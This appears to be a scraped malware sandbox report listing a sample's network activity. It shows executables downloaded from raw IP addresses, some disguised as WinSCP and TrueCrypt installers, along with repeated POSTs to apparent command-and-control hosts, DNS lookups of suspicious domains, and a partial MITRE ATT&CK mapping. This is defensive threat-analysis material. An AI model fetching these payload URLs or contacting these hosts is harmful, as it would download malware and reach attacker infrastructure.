http://5.42.65.80/newrock.exe

http

216.6kB
7.6MB
3773
5646

HTTP Request

GET http://5.42.65.80/newrock.exe

HTTP Response

200
194.49.94.72:80

http://194.49.94.72/1.exe

http

285.7kB
16.5MB
6084
11787

HTTP Request

GET http://194.49.94.72/1.exe

HTTP Response

200
194.49.94.11:80

http://194.49.94.11/

http

A610.exe

1.7MB
16.0kB
1192
238

HTTP Request

POST http://194.49.94.11/

HTTP Response

200

HTTP Request

POST http://194.49.94.11/

HTTP Response

200

HTTP Request

POST http://194.49.94.11/

HTTP Response

200

HTTP Request

POST http://194.49.94.11/

HTTP Response

200
172.67.75.172:443

https://api.ip.sb/geoip

tls, http

A610.exe

713 B
4.2kB
8
6

HTTP Request

GET https://api.ip.sb/geoip

HTTP Response

200
5.42.92.190:80

http://5.42.92.190/fks/index.php

http

94.2kB
4.5MB
1862
3248

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404
194.169.175.235:42691

617.0kB
12.9kB
476
159
5.42.92.51:19057

260 B
5
194.169.175.118:80

http://194.169.175.118/traffico.exe

http

7.5kB
420.6kB
159
305

HTTP Request

GET http://194.169.175.118/traffico.exe

HTTP Response

200
179.61.246.174:80

http://179.61.246.174/WinSCP-6.1.2-Setup.exe

http

8.5kB
485.3kB
180
349

HTTP Request

GET http://179.61.246.174/WinSCP-6.1.2-Setup.exe

HTTP Response

200
194.49.94.120:80

http://194.49.94.120/TrueCrypt_KSfcnd.exe

http

351.2kB
18.9MB
7271
13509

HTTP Request

GET http://194.49.94.120/TrueCrypt_KSfcnd.exe

HTTP Response

200
31.192.237.23:80

260 B
5
194.169.175.235:42691

652.0kB
17.7kB
500
219
5.42.92.190:80

http://5.42.92.190/fks/index.php

http

909 B
876 B
7
6

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404
5.42.92.51:19057

260 B
5
95.214.26.28:80

http://host-host-file8.com/

http

734 B
362 B
6
4

HTTP Request

POST http://host-host-file8.com/

HTTP Response

200
193.233.132.12:80

260 B
5
195.10.205.16:1056

629.8kB
14.2kB
483
193
162.159.134.233:443

cdn.discordapp.com

tls

251.9kB
7.0MB
3989
5031
185.82.216.108:443

server15.theupdatetime.org

tls

1.3kB
6.4kB
11
13
188.114.97.0:443

walkinglate.com

tls

43.2kB
2.2MB
910
1589
104.244.76.184:443

www.74ig6fk6c4wqfvdbfwu6f.com

tls

41.7kB
685.5kB
395
503

8.8.8.8:53

73.159.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

73.159.190.20.in-addr.arpa
8.8.8.8:53

158.240.127.40.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

158.240.127.40.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

241.154.82.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

241.154.82.20.in-addr.arpa
8.8.8.8:53

39.142.81.104.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

39.142.81.104.in-addr.arpa
8.8.8.8:53

55.36.223.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

55.36.223.20.in-addr.arpa
8.8.8.8:53

103.169.127.40.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

103.169.127.40.in-addr.arpa
8.8.8.8:53

56.126.166.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

56.126.166.20.in-addr.arpa
8.8.8.8:53

1.202.248.87.in-addr.arpa

dns

71 B
116 B
1
1

DNS Request

1.202.248.87.in-addr.arpa
8.8.8.8:53

88.156.103.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

88.156.103.20.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
173 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

herioteeakl.pw

dns

AppLaunch.exe

60 B
92 B
1
1

DNS Request

herioteeakl.pw

DNS Response

104.21.42.121

172.67.161.219
8.8.8.8:53

121.42.21.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

121.42.21.104.in-addr.arpa
8.8.8.8:53

254.210.247.8.in-addr.arpa

dns

72 B
126 B
1
1

DNS Request

254.210.247.8.in-addr.arpa
8.8.8.8:53

190.92.42.5.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

190.92.42.5.in-addr.arpa
8.8.8.8:53

80.65.42.5.in-addr.arpa

dns

69 B
129 B
1
1

DNS Request

80.65.42.5.in-addr.arpa
8.8.8.8:53

72.94.49.194.in-addr.arpa

dns

71 B
131 B
1
1

DNS Request

72.94.49.194.in-addr.arpa
8.8.8.8:53

11.94.49.194.in-addr.arpa

dns

71 B
131 B
1
1

DNS Request

11.94.49.194.in-addr.arpa
8.8.8.8:53

api.ip.sb

dns

A610.exe

55 B
145 B
1
1

DNS Request

api.ip.sb

DNS Response

172.67.75.172

104.26.12.31

104.26.13.31
8.8.8.8:53

172.75.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

172.75.67.172.in-addr.arpa
8.8.8.8:53

43.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

43.229.111.52.in-addr.arpa
8.8.8.8:53

235.175.169.194.in-addr.arpa

dns

74 B
135 B
1
1

DNS Request

235.175.169.194.in-addr.arpa
8.8.8.8:53

118.175.169.194.in-addr.arpa

dns

74 B
135 B
1
1

DNS Request

118.175.169.194.in-addr.arpa
8.8.8.8:53

174.246.61.179.in-addr.arpa

dns

73 B
132 B
1
1

DNS Request

174.246.61.179.in-addr.arpa
8.8.8.8:53

120.94.49.194.in-addr.arpa

dns

72 B
132 B
1
1

DNS Request

120.94.49.194.in-addr.arpa
8.8.8.8:53

8ead1c54-d881-4870-8829-8da97d840992.uuid.theupdatetime.org

dns

105 B
166 B
1
1

DNS Request

8ead1c54-d881-4870-8829-8da97d840992.uuid.theupdatetime.org
8.8.8.8:53

host-file-host6.com

dns

65 B
138 B
1
1

DNS Request

host-file-host6.com
8.8.8.8:53

host-host-file8.com

dns

65 B
81 B
1
1

DNS Request

host-host-file8.com

DNS Response

95.214.26.28
8.8.8.8:53

28.26.214.95.in-addr.arpa

dns

71 B
132 B
1
1

DNS Request

28.26.214.95.in-addr.arpa
8.8.8.8:53

16.205.10.195.in-addr.arpa

dns

72 B
132 B
1
1

DNS Request

16.205.10.195.in-addr.arpa
8.8.8.8:53

25.73.42.20.in-addr.arpa

dns

140 B
312 B
2
2

DNS Request

25.73.42.20.in-addr.arpa

DNS Request

25.73.42.20.in-addr.arpa
8.8.8.8:53

server15.theupdatetime.org

dns

144 B
176 B
2
2

DNS Request

server15.theupdatetime.org

DNS Request

server15.theupdatetime.org

DNS Response

185.82.216.108

DNS Response

185.82.216.108
8.8.8.8:53

cdn.discordapp.com

dns

128 B
288 B
2
2

DNS Request

cdn.discordapp.com

DNS Response

162.159.134.233

162.159.135.233

162.159.129.233

162.159.130.233

162.159.133.233

DNS Request

cdn.discordapp.com

DNS Response

162.159.134.233

162.159.135.233

162.159.129.233

162.159.130.233

162.159.133.233
8.8.8.8:53

stun.sipgate.net

dns

62 B
182 B
1
1

DNS Request

stun.sipgate.net

DNS Response

15.197.250.192

3.33.249.248
15.197.250.192:3478

stun.sipgate.net

48 B
124 B
1
1
8.8.8.8:53

walkinglate.com

dns

122 B
186 B
2
2

DNS Request

walkinglate.com

DNS Response

188.114.97.0

188.114.96.0

DNS Request

walkinglate.com

DNS Response

188.114.97.0

188.114.96.0
8.8.8.8:53

192.250.197.15.in-addr.arpa

dns

146 B
258 B
2
2

DNS Request

192.250.197.15.in-addr.arpa

DNS Request

192.250.197.15.in-addr.arpa
8.8.8.8:53

233.134.159.162.in-addr.arpa

dns

148 B
272 B
2
2

DNS Request

233.134.159.162.in-addr.arpa

DNS Request

233.134.159.162.in-addr.arpa
8.8.8.8:53

108.216.82.185.in-addr.arpa

dns

146 B
272 B
2
2

DNS Request

108.216.82.185.in-addr.arpa

DNS Request

108.216.82.185.in-addr.arpa
8.8.8.8:53

0.97.114.188.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

0.97.114.188.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry